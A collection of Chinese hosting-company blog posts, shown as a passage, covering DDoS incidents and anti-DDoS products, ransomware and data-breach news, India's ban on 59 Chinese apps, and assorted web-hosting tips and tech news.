不过最近这样的一个知名网站可惨了,原因是被打DDOS了,当然也混有CC攻击,这几天一直处在打不开状态。结合这几天主机吧的客户情况,主机吧认为可能是七色光联盟攻击的,这个联盟的攻击可没这么好防,原因是攻击量实在是太大。 主机吧一直关注着,想知道这样的一个知名博客是怎么防的,结果没啥看头。 他应该是平时买了个江苏的高防服务器作为转发节点,结果那高防顶不住,又换了百度云加速,但百度云加速除非买高防包,否则普通的节点根本防不了,结果可想而知,被打回源了…… 源服务器居然用的是腾讯云,以前还以为用的是阿里云呢? 估计是腾讯云的服务器确实便宜…… 总之还是钱不够哈,对付这种量级的攻击用百度云加速普通节点防不了滴,主机吧推荐购买百度云加速高防包,300G那种: 高防包类型:即刻版 高防包有效期:365天 高防IP:1个 防护线路:BGP 防护时长:24小时 防护峰值:300Gbps 业务带宽:100Mbps 业务端口:50个 防御域名:50个 或者买高防IP,DDOS防御峰值要300G以上,机房天然屏蔽海外流量的那种,千万不可能买那种开放海外流量的,因为七色光的攻击海外流量占了很大一部分,即使你通过服务器屏蔽海外流量也是没用的,因为流量已经从机房进来了,机房还是按海外的流量给你计算,这样的话七色光很容易打出300+的流量,那要防的话得大出血了…… 未完待续……   #### 印尼国家数据中心遭黑客入侵,被勒索 1310 亿印度尼西亚盾 6 月 25 日消息,印度尼西亚通讯部长周一告诉路透社,一名网络攻击者入侵了印度尼西亚国家数据中心,扰乱了机场的移民检查,并勒索 1310 亿印度尼西亚盾的赎金(约 5811 万元人民币)。 印尼政府在周一的新闻发布会上表示,该数据中心由印度尼西亚通信和信息技术部(Kominfo)运营,名为 National Data Center 或 Pusat Data Nasional(PDN),于 6 月 20 日遭到入侵。 据印尼当地报纸 Tempo 报道,由于 PDN 被入侵,至少 210 家机构受到影响,部分印尼服务受到严重干扰。最值得注意的是,移民数字服务被关闭,影响了该国处理签证、护照和居留许可的速度。这导致机场排起长队,但印度尼西亚表示,这种情况现已得到控制,自动护照扫描仪已重新上线。 报道提到,入侵 PDN 的勒索软件显然是 LockBit 3.0 的变种,当地报道援引官员的话说,这是一个名为 Brain Cipher 的变种。博通在一周多前发现了这种特殊病毒,并称其为双重勒索软件,可渗透并加密被盗数据。 印度尼西亚通讯部长告诉记者,袭击者要求支付 1310 亿印度尼西亚盾的赎金。截至目前,印尼官方尚未回应是否计划支付赎金。 #### 印度一程序员“删库跑路”被判两年零八个月监禁 6 月 17 日消息,据外媒 CNA 报道,一名任职于新加坡 NCS 集团的印度工程师 Kandula Nagaraju,因被解雇后心生不满而采取了“删库”的报复行动,造成 91.8 万新加坡币(约 493.3 万元人民币)的损失,被判两年零八个月监禁。 据悉,Kandula Nagaraju 在 2021 年 11 月至 2022 年 10 月期间曾任职 NCS 集团质量保证(QA)部。 在 2022 年 11 月 16 日其由于工作表现问题被终止合同。根据法院文件,Kandula Nagaraju 在被解雇时感到“困惑和沮丧”,因为他觉得自己表现良好,并在任职期间为 NCS 做出了“良好贡献”,因此他决定“报复公司”。 在 2023 年 Kandula Nagaraju 回到印度后,使用自己的笔记本电脑通过管理员登录凭据在未经授权的情况下访问了 NCS 的系统,并删除了公司的 180 台虚拟服务器。 NCS 团队在发现系统无法访问后,意识到服务器已被删除,并于 2023 年 4 月向警方报案,警方调查锁定了 Kandula Nagaraju 为嫌疑人,并在他的笔记本电脑中发现了用于执行删除操作的脚本。 2024 年 6 月 10 日,Kandula Nagaraju 因未经授权访问计算机的指控被警方抓获,最终判处两年零八个月监禁,此外他还面临另一项未具名的指控,据称“刑期可能会进一步增加”。 #### 印度本地搜索应用Justdial出现严重漏洞 泄露1.56亿用户信息 Digital program code with a earth globe backgroundThis is a photoshop edited image. Some components of this montage are provided courtesy of NASA, and have been found at http://visibleearth.nasa.gov/ 10月10日 消息:据TNW消息,印度本地搜索应用Justdial被曝出现一个严重漏洞,这导致黑客可以登录该APP 1. 56 亿用户的账户。 上个月,安全研究员Ehraz Ahmed发现该漏洞,主要利用了用于注册的网站Register API 缺陷。根据Ahmed发布的一段视频显示,黑客可以使用一个人的电话号码作为用户名,并通过该漏洞访问该帐户。该漏洞甚至允许黑客更改JD Pay的账户详细信息。 据称,黑客除了可以通过该漏洞访问用户姓名、电话号码和电子邮件地址等信息以外,还能获取用户通过该公司支付提供服务JustDial Pay挖掘用户交易情况、账户约等财务信息。 JustDial在一份声明中称,该漏洞已于昨日修复,并未导致数据丢失,并与安全研究人员增加平台安全。 #### 印度禁用59款中国App完整名单 6月30日 消息:据印度快报等媒体消息,昨日,印度政府宣布禁用 59 款中国APP,声称这些APP“损害了印度的主权和完整、国防、国家安全和公共秩序”。 据悉,这些应用包括了: TikTok、QQ、微信、微博、快手、美图、UC浏览器等。 此前,一款名为”一键卸载中国APP“的应用在印度走红,但不久后被谷歌应用商店下架。 5 月 30 日,一个名为“Remove China Apps”(删除中国App)的应用在国外走红,该应用在谷歌商店上架的前十天下载量达 100 万次,并登上了谷歌应用商店下载榜。该应用可识别哪些来自中国公司,然后就可以”一键卸载“。 该APP的开发商名为OneTouch AppLabs,位于印度拉贾斯坦邦的斋浦尔。该应用程序的开发者、印度初创公司声称,这款应用是“为教育目的而开发的”,而中国的手机App是“不安全的”。 不过就在不久后,这款App因违反谷歌商店政策被下架,谷歌没有说明具体原因。 名单 如下是受影响的App名单。 起草公告的公务员也秉承了印度公共服务一贯的严谨作风,把其中至少两个App的名字拼错了: 1. TikTok (抖音海外版) 2. Shareit (茄子快传) 3. Kwai (快手) 4. UC Browser (UC浏览器) 5. Baidu map (百度地图) 6. Shein (跨境电商——南京领添) 7. Clash of Kings (列王的纷争——北京智明星通旗下的游戏) 8. DU battery saver (点心省电) 9. Helo (字节旗下社交软件) 10. Likee (欢聚时代旗下的短视频,前些日子刚宣布加码出海) 11. YouCam makeup 12. Mi Community (小米社区) 13. CM Browers (原文写错:猎豹旗下浏览器) 14. Virus Cleaner (病毒清理大师) 15. APUS Browser (Apus浏览器) 16. ROMWE (Shein旗下电商站) 17. Club Factory (跨境电商) 18. Newsdog (新闻聚合) 19. Beutry Plus (原文写错,应为:美图) 20. WeChat (微信) 21. UC News (UC新闻) 22. QQ Mail (QQ邮件) 23. Weibo (微博) 24. Xender (闪传) 25. QQ Music (QQ音乐) 26. QQ Newsfeed (腾讯新闻) 27. Bigo Live (欢聚时代旗下的直播软件) 28. SelfieCity (潮自拍) 29. Mail Master (网易邮箱大师) 30. Parallel Space (平行空间) 31. Mi Video Call Xiaomi (小米视频电话) 32. WeSync (QQ同步助手) 33. ES File Explorer (百度旗下的文件浏览器) 34. Viva Video QU Video Inc (小影) 35. Meitu (美图) 36. Vigo Video (火山视频) 37. New Video Status 38. DU Recorder (百度录屏) 39. Vault- Hide (私密图库) 40. Cache Cleaner DU App studio 41. DU Cleaner (百度清理大师) 42. DU Browser (百度浏览器) 43. Hago Play With New Friends (小游戏社交) 44. Cam Scanner 45. Clean Master Cheetah Mobile (猎豹清理大师) 46. Wonder Camera (百度魔拍) 47. Photo Wonder (百度魔图) 48. QQ Player (QQ影音) 49. We Meet 50. Sweet Selfie (爱自拍) 51. Baidu Translate (百度翻译) 52. Vmate (阿里已经被放弃的印度短视频) 53. QQ International (QQ国际) 54. QQ Security Center (QQ安全中心) 55. QQ Launcher (QQ桌面) 56. U Video (快手旗下短视频) 57. V fly Status Video 58. Mobile Legends (沐瞳科技山寨王者荣耀) 59. DU Privacy (百度隐私空间) #### 印度科技巨头塔塔被曝遭遇勒索软件攻击,总量 1.4TB 的超 73 万个文档被窃 3 月 13 日消息,据外媒 TechCrunch 本周二报道,勒索软件团伙 Hunters International 近日发布了其声称从塔塔技术公司(Tata Technologies)窃取的部分数据,时隔一个多月后,塔塔确认了去年发生的勒索软件攻击,该攻击曾导致部分服务中断。 泄露的数据已发布在该团伙的暗网泄密网站上,内容包括塔塔技术公司部分员工的个人信息和机密数据,如采购订单和公司与印度及美国客户的合同。 团伙称,这一数据集包含超过 73 万个文档,涵盖 Excel 表格、PowerPoint 文件和 PDF 文件,文件总大小约为 1.4TB。 塔塔技术公司曾在 1 月底向印度证券交易所通报,表示此次勒索软件攻击影响了公司的部分 IT 资产,但声明称其客户服务并未受到影响,保持正常运营。 Hunters International 发布的数据,是否与今年早些时候塔塔技术公司披露的勒索软件事件有关,目前暂不清楚。 塔塔技术公司成立于 1989 年,起初是塔塔汽车公司的一个部门,1994 年独立运营,并一直作为塔塔集团的子公司。公司为汽车、航空航天及工程行业提供产品设计和研发服务,遍布 27 个国家,设有 20 个交付中心,员工超过 12500 人。 Hunters International 成立于 2023 年底,是一家相对较新的勒索软件即服务团伙,提供基础设施支持给附属黑客进行勒索攻击,团伙从中抽取部分赎金收入。 #### 印度航空450万客户数据遭黑客窃取:客户遍及全世界 5月23日消息:印度航空(Air India)官网近日发布消息称,该公司大约 450 万名客户的数据遭黑客窃取,这些客户遍及全世界。声明说,黑客窃取的数据包括客户姓名、信用卡账号和护照信息,“我们对由此造成的不便深感抱歉,希望广大旅客继续支持和信任我们”。印度航空已着手采取补救措施,与外部专家和信用卡公司合作加强数据安全。 此前印度航空曾于 3 月 19 日曾发布声明表示,公司 2021 年 2 月曾遭受一次复杂的网络攻击,公司正在评估风险,并将在有消息时进一步更新。 据了解,近年已经发生多起黑客入侵航空公司网站窃取用户数据的事件。英国航空公司 2018 年遭黑客攻击, 40 万名客户数据泄露,英国监管部门 2020 年因这起事件对英航处以 2800 万美元罚款。英国易捷航空公司去年披露,该公司大约 900 万名客户的电子邮箱、出行信息等数据遭黑客窃取。 #### 危险有病毒!千万别在微信群接收不明文件 最近,主机吧用电脑打开微信群,发现有人了一个不明的压缩包,压缩包名字写得很动听,XX事件 结果主机吧点开一看,居然有病毒! 而且主机吧还发现微信PC客户端是自动默认下载文件到本地电脑上的,这个操作非常危险。 有用电脑登陆微信的同学,赶紧进入微信设置,文件管理,把文件自动下载、 以只读的方式打开聊天中文件功能关了。 #### 危险!字体公司又来碰瓷了! 最近,有站长收到了汉仪字体公司的商洽函了。 这家公司的商业字体很多在网上可以随便免费下载的,这就导致了很多公司在不知道这个字体能不能商用的情况下就用了他们的字体,这就中招了。 遇到这种问题,其实不要慌,首先第一时间把使用了他们的字体改了,然后准备材料,比如这种字体你在哪下载的,当时并没有提示商用字体之类的,如果是别人帮你做的,那就保留当时的聊天记录之类的,总之要做的就是我不知道,我并不知情。 千万别主动联系对方,主动就输了,主动联系对方,对方通常会给你报一个非常高的价格,即使你跟对方讲价也非常吃亏。 我们要当没事发生,如果对方真的到法院把你告了,那就准备之类的资料应诉就好了,法院通常不会判赔非常离谱的价格的。 只要你积极应诉,字体公司一般不会真的告你的,因为打官司时间长,而且这种碰瓷也得不到法院支持,通常不了了事。 当然,如果你是大公司,上市公司那种,对方可能逮到你,狠狠的咬一口。 #### 危险!微信域名转图片发朋友圈 一律封杀 微信最近对于各种违规行为的打击力度明显加大,比如清理侵权账号 7 万个、处理涉赌账号 3 万多个,现在又对域名转图片发朋友圈的行为下了重手。 微信表示,朋友圈对于链接的传播有防刷屏机制,近期发现有一些公司存在绕过机制,在微信上进行恶意违规及对抗行为,包括但不限于通过批量域名或者将域名转变成图片等形式进行刷量。 针对此类行为,微信团队将进行相关处理。 规则定义: 恶意违规及对抗行为是指在主观上存在故意性,客观上实施违反《微信公众平台运营规范》及《微信外部链接内容规范》等协议规则的行为,包括但不限于以下形式: 1、重复多次违规: 违规被处理后仍采用类似或其他形式继续违规的。 2、对抗措施: 单独或与他人共同对微信外部链接内容管理的运营流程、安全策略等进行技术对抗、规避绕开、寻找或制造平台漏洞实施违规行为或为此提供协助的。 示例: 刷屏链接经警告后,将域名转变为图片形式在朋友圈进行诱导分享、诱导下载等行为。 处理措施: 以上情况,一经发现将立即进行处理,包括但不限于停止链接内容在朋友圈继续传播、停止对相关域名或IP地址进行访问,封禁相关开放平台帐号或应用的分享接口。 对于情节恶劣的情况,永久封禁帐号、域名、IP地址或分享接口。 #### 历史一刻!阿里巴巴销售远超亚马逊稳居第一 由于去年新冠疫情,多国纷纷采取封锁措施,这也导致电商销售额激增。 据媒体报道,来自联合国贸易与发展会议发布的最新报告显示,由于疫情封锁等原因,使电子商务的在线零售从2019年占零售总额的16%增加到19%。 报告显示,由于疫情,给全球B2C电子商务公司带来了喜忧参半的结果,但2020年排名前13位的B2C电子商务公司的总GMV增长了20.5%,高于2019年的17.9%。 按照GMV排名,前13家电子商务公司有11家分别来自中国和美国,其中阿里巴巴位居第一、京东位居第三、拼多多位居第四、美团位居第七。 值得一提的是,排名前13位的B2C公司GMV在2020年达到2.9万亿美元,而排名第一的阿里巴巴销售额就高达11450亿美元,是第二名亚马逊5750亿美元的2倍还多。 由于封锁措施,导致提供乘车和旅行等服务的平台公司销售额急剧下滑。例如,线上旅游公司Expedia从2019年的第5位跌至2020年的第11位,Booking Holdings从第6位跌至第12位,而爱彼迎(Airbnb)从11位跌至第13位。 不得不感叹危机危机,危险中存在的机遇啊,相信经过这次疫情,只要国内控制得好,会有更多国内企业站在世界至高点! #### 历史上最大的DDOS攻击刷新,数据比之前的记录高出 76% 今年 6 月,Cloudflare 证实, 受到历史上最大的 HTTPS 分布式拒绝服务 (DDoS) 攻击,不过它在出现任何实际损失之前就成功阻止了这次破纪录的攻击。该公司透露,它记录了每秒 2600 万次请求的 DDoS 攻击。 而刚刚谷歌报告说,他们发现了一次大规模的 DDOS 攻击,对方尝试关闭其 Cloud Armor 客户服务,峰值可达每秒 4600 万个请求,规模相当于此前记录的 176.92%。这使其成为有史以来报告的最大的一次七层分布式拒绝服务攻击。 谷歌解释说,在高峰期,这种攻击相当于在 10 秒内实现一整天的 Wikipedia 访问量,因此能够抵御如此强大的 DDoS 攻击是一项令人难以置信的壮举。 据介绍,Google Cloud Armor 通过使用负载平衡技术定期保护应用程序(第 7 层)和网站免受此类互联网攻击,即使在面临这些挑战时也能保持 Web 服务运行。 谷歌 Cloud Armor 声称每秒可支持超过 100 万次查询请求,但这次它们却成功处理了 4600 万次每秒的负担。 谷歌报告称,Cloud Armor 成功检测到了此次 DDoS 攻击,并向客户推荐了一条规则来阻止攻击,实际效果不错。几分钟后,攻击者意识到攻击失败后,数据请求出现下降。 不过,谷歌指出 DDoS 攻击的数量呈指数级增长,而且是由大量恶意机器人提供的,因此这一记录可能不会保持太久。 #### 历史上那些最大的DDoS攻击事件 迄今为止最大的DDoS攻击发生在2018年2月。这次攻击的目标是数百万开发人员使用的流行的在线代码管理服务GitHub。在此高峰时,此攻击以每秒1.3太字节(Tbps)的速率传输流量,以每秒1.269亿的速率发送数据包。 这是一个memcached DDoS攻击,因此没有涉及僵尸网络。相反,攻击者利用了一种称为memcached的流行数据库缓存系统的放大效应。通过使用欺骗性请求充斥memcached服务器,攻击者能够将其攻击放大约50,000倍! 幸运的是,GitHub正在使用DDoS保护服务,该服务在攻击开始后的10分钟内自动发出警报。此警报触发了缓解过程,GitHub才能够快速阻止攻击。最终这次世界上最大的DDOS攻击只持续了大约20分钟。   第二大攻击——2016 Dyn攻击 第二大DDoS攻击是针对2016年10月主要DNS提供商Dyn 。这次攻击造成了破坏,并造成许多主要网站的中断,包括AirBnB,Netflix,PayPal,Visa,亚马逊,纽约时报,Reddit,和GitHub。这是使用名为Mirai 的恶意软件完成的。Mirai利用受损的物联网(IoT)设备创建僵尸网络,例如相机,智能电视,收音机,打印机甚至婴儿监视器。为了创建攻击流量,这些受损设备都被编程为向单个受害者发送请求。 幸运的是,Dyn能够在一天内解决攻击,但攻击的动机从未被发现。黑客组织声称对此次攻击负责,因为维基解密创始人朱利安·阿桑奇在厄瓜多尔被拒绝上网,但没有证据支持这一说法。还有人怀疑这次袭击是由心怀不满的游戏玩家进行的。   2013年Spamhaus袭击事件 另一个最大规模的攻击是2013年针对Spamhaus发起的攻击,Spamhaus是一个帮助打击垃圾邮件和垃圾邮件相关活动的组织。Spamhous负责过滤所有垃圾邮件中的80%,这使得它们成为那些希望看到垃圾邮件到达目标收件人的人们的热门目标。 这次袭击以300 gbps的速度推动了Spamhous的流量。一旦攻击开始,Spamhous就会报名参加Cloudflare。Cloudflare的DDoS保护减轻了攻击。攻击者通过追捕某些互联网交换机和带宽提供商以试图打倒Cloudflare 来应对此问题。这次攻击没有实现其目标,但它确实引起伦敦互联网交换机LINX的重大问题。这次袭击的罪魁祸首竟然是英国一名青少年黑客,他因为发起这次DDoS攻击而获得报酬。   2000年Mafiaboy袭击 2000年,一位名叫“Mafiaboy”的15岁黑客取消了几个主要网站,包括CNN,戴尔,电子贸易,eBay和雅虎,这些网站当时是世界上最受欢迎的搜索引擎。这次袭击造成了毁灭性的后果,包括在股市中造成混乱。 Mafiaboy后来被透露为一名名叫Michael Calce的高中生,通过入侵几所大学的网络并利用他们的服务器进行DDoS攻击来协调攻击。这次袭击的后果直接导致了今天许多网络犯罪法的制定。 2007年爱沙尼亚袭击事件 2007年4月,爱沙尼亚遭受了针对政府服务以及金融机构和媒体机构的大规模DDoS攻击。由于爱沙尼亚政府是当时在线政府的早期采用者并且当时几乎没有纸张,因此这产生了破坏性影响; 甚至全国选举也是在线进行的 这次袭击被许多人认为是网络战的第一幕,是为了回应与俄罗斯就第二次世界大战纪念碑“塔林青铜战士”的重新安置发生的政治冲突。俄罗斯政府涉嫌参与,一名来自俄罗斯的爱沙尼亚国民因此被捕,但俄罗斯政府并未让爱沙尼亚执法部门在俄罗斯进行任何进一步调查。这种折磨导致了网络战国际法的制定。   从这些攻击事件来看,全世界几乎不分行业不分地区,都在受到DDOS攻击的困扰,小到一个网站,大到一个国家,DDOS攻击无孔不入。不过我们从这些案例中也能看到,造成特别严重损失的其实并不多,这是因为越来越多的网站、企业选择了DDOS防护服务,或者是高防IP,或者使用高防服务器,都帮助网站在攻击下安稳运行。 ———————————————— 如果你的网站或者企业也曾对DDOS攻击苦不堪言,不要担心,找主机吧就对了。 #### 历史著名的DDoS攻击有哪些? 历来规模最大的 DDoS 攻击是哪一次? 迄今最大规模的 DDoS 攻击发生于 2017 年 9 月。该攻击的目标是 Google 服务,规模达到 2.54 Tbps。Google Cloud 于 2020 年 10 月披露了这次攻击。 攻击者向 18 万个 web 服务器发送虚假请求,后者将响应发送给 Google。这次攻击并非一个孤立的事件:攻击者在之前六个月内已对 Google 的基础设施发动了多次 DDoS 攻击。 还有哪些轰动一时的 DDoS 攻击? AWS 报告发生于 2020 年 2 月的攻击 AWS 报告在 2020 年 2 月缓解了一次大规模 DDoS 攻击。这次攻击的峰值流量速率达到 2.3 Tbps(太比特/秒)。AWS 没有透露这次攻击的目标是哪一个客户。 攻击者使用了遭到劫持的无连接轻量目录访问协议(CLDAP)Web 服务器。CLDAP 是一种用户目录协议。它是这种协议的较老版本 LDAP 的替代品。近年来,CLDAP 已被用于多起 DDoS 攻击。 2018 年 2 月 GitHub 遭受的 DDoS 攻击 有记录可验证的最大型 DDoS 之一目标是 GitHub——数百万名开发人员使用的代码管理服务。这次攻击达到 1.3 Tbps,数据包发送速率达到 1.269 亿个/秒。 GitHub 遭受的攻击是一次 memcached DDoS 攻击,因此没有涉及僵尸网络。攻击者利用了 memcached 这种流行数据库缓存系统的放大效应。通过向 memcached 服务器发送大量虚假请求,攻击者成功将其攻击放大约 5 万倍。 幸运的是,GitHub 采用了 DDoS 保护服务,在攻击发起后 10 分钟内自动得到警报。警报触发了缓解过程,GitHub 得以迅速阻止了攻击。这次大规模 DDoS 攻击仅持续了大约 20 分钟就结束了。 2016 年 Dyn 攻击 另一次大型 DDoS 攻击发生于 2016 年 10 月,目标是主要 DNS 提供商 Dyn。这次攻击带来了毁灭性打击,对很多主要网站造成了破坏,包括 AirBnB、Netflix、PayPal、Visa、Amazon、The New York Times、Reddit 和 GitHub。这次攻击使用了一个名为 Mirai 的恶意软件。Mirai 利用受损的物联网(IoT)设备(如相机、智能电视、收音机、打印机,甚至婴儿监视器)创建僵尸网络。为形成攻击流量,这些受损设备均经过编程,全部向单一受害者发送请求。 幸运的是,Dyn 在一日内击退了攻击,但一直未能确定攻击动机。黑客组织声称对此次攻击事件负责,理由是维基解密创始人 Julian Assange 在厄瓜多尔被拒绝使用互联网,但没有证据能够支持这一说法。也有人怀疑此次攻击由心怀不满的游戏玩家发起。 2015 年 GitHub 攻击 这是当时规模最大的一次 DDoS 攻击,攻击目标刚好也是 GitHub。这次带有政治动机的攻击持续了数日,而且围绕实施的 DDoS防护策略进行了调整。DDoS 流量源于中国,并专门针对两个旨在绕过中国国家审查的 GitHub 项目。据推测,攻击目的是试图强迫 GitHub 取消这些项目。 攻击者将 JavaScript 代码注入所有访问百度(中国最受欢迎的搜索引擎)的用户的浏览器,进而形成攻击流量。其他使用百度分析服务的站点也注入该恶意代码,代码导致被感染的浏览器向目标 GitHub 页面发送 HTTP 请求。攻击发生后,据确定恶意代码并非源于百度,而是由中间服务添加的。 2013 年 Spamhaus 攻击 2013 年针对 Spamhaus 的攻击也是一场规模空前的攻击,Spamhaus 是一家帮助打击垃圾邮件和垃圾邮件相关活动的组织。Spamhous 负责过滤多达 80% 的垃圾邮件,因而频频遭到希望垃圾邮件顺利到达目标收件人的恶意分子攻击。 这次攻击以 300 Gbps 的速度向 Spamhous 推送流量。攻击开始后,Spamhous 立即向 Cloudflare 寻求帮助并达成协议。Cloudflare DDoS 保护缓解了攻击。攻击者的回应是攻击特定互联网数据交换中心和带宽提供商,试图弄垮 Cloudflare。这次攻击没有达到目的,但确实给伦敦互联网交换中心(LINX)造成了重大问题。攻击的罪魁祸首原来是英国一名少年黑客,受雇发动此次 DDoS 攻击。 2000 年 Mafiaboy 攻击 2000 年,一名年仅 15 岁、化名“Mafiaboy”的少年黑客导致若干主要网站陷入瘫痪,其中包括 CNN、Dell、E-Trade、eBay 和雅虎,后者是当时全球最受欢迎的搜索引擎。这次攻击造成了严重破坏,其一是引发股市混乱。 后来有消息显示 Mafiaboy 是一名高中生,真名为 Michael Calce。他通过破坏几所大学的网络并使用其服务器来发动这次 DDoS 攻击。这次攻击直接导致了今天很多网络犯罪法律的制定。 2007 年爱沙尼亚攻击 2007 年 4 月,爱沙尼亚遭受了一次针对政府服务、金融机构和媒体机构的 DDoS 攻击。由于爱沙尼亚政府率先采用了网上政务系统,当时已基本实现无纸化,甚至全国大选都在网上进行,因此攻击产生了毁灭性的影响。 此次攻击被很多人视为网络战争的序幕,旨在回应与俄罗斯就第二次世界大战纪念碑“塔林青铜战士”的重新安置发生的政治冲突。俄罗斯政府涉嫌参与攻击,一名来自俄罗斯的爱沙尼亚公民因此被捕,但俄罗斯政府未允许爱沙尼亚执法部门在俄罗斯开展任何进一步的调查。这次攻击催生了网络战国际法。 DDoS 防护提供商是否能缓解这种规模的攻击? 这取决于它们的网络容量:它们能否吸收 DDoS 攻击正在产生的流量,同时仍能提供服务。很多 DDoS 防护和缓解提供商都有足够的网络容量来做到这一点。 尽管 Cloudflare 曾经缓解的最大容量 DDoS 攻击为 1.2 Tbps,Cloudflare 的网络容量可达 142 Tbps,远远超过有史以来最大的 DDoS 攻击。Cloudflare 也缓解过具有极高包速率和 HTTP 请求率的 DDoS 攻击。2020 年 6 月,Cloudflare 缓解了一次每秒 7.54 亿个数据包的 DDoS 攻击。2021 年 8 月,Cloudflare 缓解了一次每秒 1720 万个请求的 DDoS 攻击。 重要的是,大部分 DDoS 攻击的规模都没有本文所列出的攻击那么严重。Cloudflare 的研究显示,大多数 DDoS 攻击不超过 10 Gbps。然而,如果没有采取 DDoS 缓解措施,即使这些较小型 DDoS 攻击在长时间持续后也能导致网站和应用程序下线。 #### 历战多日终于为客户成功解决网站卡顿打不开问题 今天成功帮一位网站成功解决了被刷流量的问题,因为过程序比较曲折,所以小编特地写下来供大家参考。 就在前天,一位站长联系上主机帮,想要接入百度云防护,小编在帮站长成功接入百度云防护,并配置了基本的防护规则后,第一天还好好的,结果第二天客户联系上主机帮,反馈网站突然乱码了。 一开始主机帮以为是网站程序编码问题,因为通过百度云防护查看该网站并没有大量的访问请求,也没有识别出有大量CC攻击,于是让这位客户联系程序开发商或者重启看下。结果客户重启服务器后,刚恢复没多久,又频繁出现了乱码。 客户联系上所在的服务商西部数码反馈,结果得出是“网站被CC攻击,导致资源耗尽所致”,客户服务器开启了硬防和软防才好点,但是会出现非常卡顿的情况,而且主机帮测试后发现西部数码的硬防经常会无源无故断开连接。 而且主机帮通过远程登录客户服务器发现即使是客户反馈卡慢的时候,服务器的CPU、带宽都很低的。 那是什么原因呢?通过查看客户网站建站环境,发现采用的是西部数码的建站助手,用的是IIS+PHP+MYSQL的组合,这个环境怎么说呢?很古老,用来运行PHP效率贼差,而且IIS运行PHP有个缺陷,经常会出现应程池满导致网站无法打开的情况。所以主机帮建议客户更换一个网站环境试试,采用linux+宝塔的方式。但由于客户网站是多年前部署的,里面数据量贼多,高达60多G,如果搬起来的话很麻烦,所以一直没操作,这期间主机帮通过查看日志的方式,使用百度云防护JA3指纹拦截了一堆的IP。 但这其实没什么用,因为主机帮发现几乎把所有可疑的IP都拦截了,服务器还是一直非常卡,而且百度云防护的回源频率也非常低,客户的服务器是16核32G的不可能因为这点频率就卡死,而且服务器的性能显示也正常。 所以主机帮怀疑是服务器本身问题或者服务器环境有问题。再三思考后,主机帮决定帮客户搬家,客户购买新的服务器后,我们帮他搬到新的服务器上,服务器环境采用linux+宝塔+Nginx+PHP。 经过几个小时的数据搬迁后,成功运行到了新的服务器上了,结局没有意外,新服务器运行非常平稳,也没有出现过像之前一样打不开或者卡死的情况,甚至带宽都不超过2M,所以可以判断是旧服务器的问题或者原本服务器环境的问题。 目前客户网站运行平稳,主机帮利用百度云防护针对一些访问频率非常高、刷网站图片的机器进行了拦截。 至此,经过两天的努力,终于帮客户成功解决了网站频繁卡顿的问题了。 #### 厉害了黑客!黑美国ATM机自动吐钞635万 随意拿 最近不少黑客开始对ATM机下手,导致不少机器自动吐槽,其中美国受损最严重。 据CNET报道称,美国特勤局一位高级官员对外表示,一个黑客组织利用“Jackpotting”攻击从ATM提款机窃取 100 多万美元,这个组织与国际犯罪集团有关系,黑客利用Jackpotting”攻击强迫提款机吐出现金。 具体来说就是,这个黑客组织在短短 6 天时间,让美国不少ATM机都出现了自动吐钞,而约合 635 万元的钞票,就这样被轻易吐出来,被不同的人拿走。 目前,在美国多个地方已经发现ATM遭到攻击,从美国南部的墨西哥湾沿岸到东北部的新英格兰地区,都发现攻击的痕迹,至于什么时候会停止,还不清楚。 #### 厉害啦!百度与华能签署合作备忘录,打造智慧能源经济 “十四五”期间,建设新型能源基础设施,推进能源革命,打造智慧能源系统成为能源领域的核心工作。2月26日,中国华能集团与百度公司在华能总部签署《合作备忘录》,共同推动数字经济和能源电力产业深度融合。双方未来将充分发挥各自优势,在信息技术、数字技术等方面开展多层次多领域合作,共同推动新一代自动化、智能化财务共享平台建设,在为社会提供能源行业数据服务方面实现数字化、网络化、智能化发展。传统能源巨头与科技巨头的携手,将加快中国能源行业智能化升级步伐。中国华能集团公司总经理、党组副书记邓建玲,党组成员、总会计师王益华,百度首席技术官王海峰,百度智能云副总裁杨兆明,百度副总裁徐菁出席签字仪式。王益华、杨兆明分别代表双方在协议上签字。签字仪式前,王海峰一行参观了华能展厅,双方就进一步加强沟通、深化合作进行了会谈。邓建玲对王海峰一行的到来表示欢迎,并介绍了华能发展历史和“十四五”战略规划有关情况,重点介绍了华能数字化发展规划。他说,“推动数字经济与能源电力产业深度融合,进一步释放电力大数据价值,对于保障国家能源安全、助力行业高质量发展具有重要意义。华能将数字化作为“十四五”期间推动公司由能源生产型向生产服务型转型的重要抓手,正在按照向资本开放、向市场开放、向用户开放“三个开放”原则,探索构建集团级数字化大平台,为社会提供以共享为基础的能源行业数据服务。百度公司作为中国顶尖的高科技公司,是华能的重要合作伙伴,希望双方以此次备忘录签署为契机,充分发挥各自优势,进一步深化战略合作,不断丰富大数据、人工智能等在能源电力领域的应用场景,共同打造数字经济新动能。”华能集团总经理、党组副书记邓建玲作为国内最早投入、技术最强、布局最完整的人工智能领军企业,百度正在依托全栈、领先的人工智能技术能力和丰富的产业实践经验打造新型AI基础设施。百度CTO王海峰表示:中国经济正在转向高质量发展阶段,人工智能是驱动经济高质量发展的新动能、新引擎。能源行业作为国民经济的重要组成部分,其智能化建设程度,直接关系到国民经济和社会智能水平。希望华能充分发挥领先的能源行业地位和丰富的行业场景优势,百度充分利用人工智能、大数据、云计算等技术优势,加强全方位合作,支持能源行业数字化、智能化升级。 百度CTO王海峰从建立之初起,百度就一直将绿色环保节能的理念贯彻于公司技术创新及运营之中,是中国绿色数据中心开创者和引领者。百度阳泉云计算中心采用AI实现智能运维,更及时、快速、全面地掌握自身运营状况,实现智能供电、智能散热,确保数据中心低能耗高性能运行,更加绿色节能。百度智能云还将智慧能源解决方案输送到能源行业,目前已经与国家电网、南方电网、中国石油、国家电投、中广核集团等能源行业头部企业达成战略合作,与合作伙伴不断探索能源生产、管理、调度等环节的数字化和智能化,为用户提供更高效、更清洁、更低碳的能源服务。未来,百度与华能将结合华能正在建设的财务共享中心,助力华能研发新一代自动化、智能化财务共享平台,建设自动化的现代会计工厂和智能化的业财融合数字体系、可自由交换与自主交易的能源数据商业化平台、能源行业专业级的商业数据库,以及服务社会的现代能源SaaS(软件即服务)服务体系。在国家大力布局新型基础设施的当下,百度智能云“以云计算为基础,以人工智能为抓手,聚焦重要赛道”为战略,形成“云智一体”的独特竞争优势。百度智能云率先在业内打造AI原生云计算架构,助力企业快速“上云”,同时向各行各业输出百度大脑的领先技术,使企业可以便捷高效的接入AI能力。百度智能云希望携手更多能源行业合作伙伴,加速智慧能源系统的建设,推动中国能源产业朝着网络化、智能化、综合化、清洁化、多元化的方向迅速迈进。 #### 厉害我国网速已进入全球第一梯队! 1月15日 消息:    